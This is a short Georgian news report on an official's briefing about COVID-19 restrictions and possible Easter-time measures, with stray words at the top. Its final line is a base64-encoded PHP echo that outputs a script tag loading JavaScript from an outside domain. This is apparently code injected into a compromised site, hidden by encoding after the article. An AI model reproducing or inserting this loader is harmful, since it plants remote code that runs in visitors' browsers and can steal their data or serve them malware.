celsiusi
ავერსი საქკაბელი
უწყებათაშორის საკოორდინაციო საბჭოსთან არსებული ოპერაციული შტაბის უფროსის გიორგი ღიბრაძის განცხადებით, შეზღუდვებთან მიმართებით ყოვედღიურად მიმდინარეობს მსჯელობა და რა გადაწყვეტილბა იქნება მიღებული ეს  დაფუძნებულია ანალიზზე და არსებულ ეპიდვითარებაზე. ამის შესახებ მან ბრიფინგზე განაცხადა.
 
მისივე თქმით, კორონავირუსთან დაკავშირებით დამატებითი შეზღუდების დაწესება ამ ეტაპზე არ განვიხილავთ, თუმცა კითხვაზე მოსალოდნელია თუ არა, რომ აღდგომის დღესასწაულთან დაკავშირებით დამატებითი რეგულაცები ამოქმედდეს აღნიშნა, რომ გამორიცხული არაფერია.
 
„შეზღუდვებთან მიმართებით ყოვედღიურად მიმდინარეობს მსჯელობა. ეს არის დაფუძნებული ანალიზზე და არსებულ ეპიდვითარებაზე. აღნიშნულ მომენტში დამატებით შეზღუდვებზე საუბარი და განხილვა არ ყოფილა, თუმცა გამორიცხული არაფერია. ეპიდემიოლოგიური ვითარებიდან გამომდინარე შესაძლოა, მოხდეს ზომების როგორც გამკაცრება, ისე შემსუბუქება“,- აღნიშნა  ღიბრაძემ.
 
1286
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");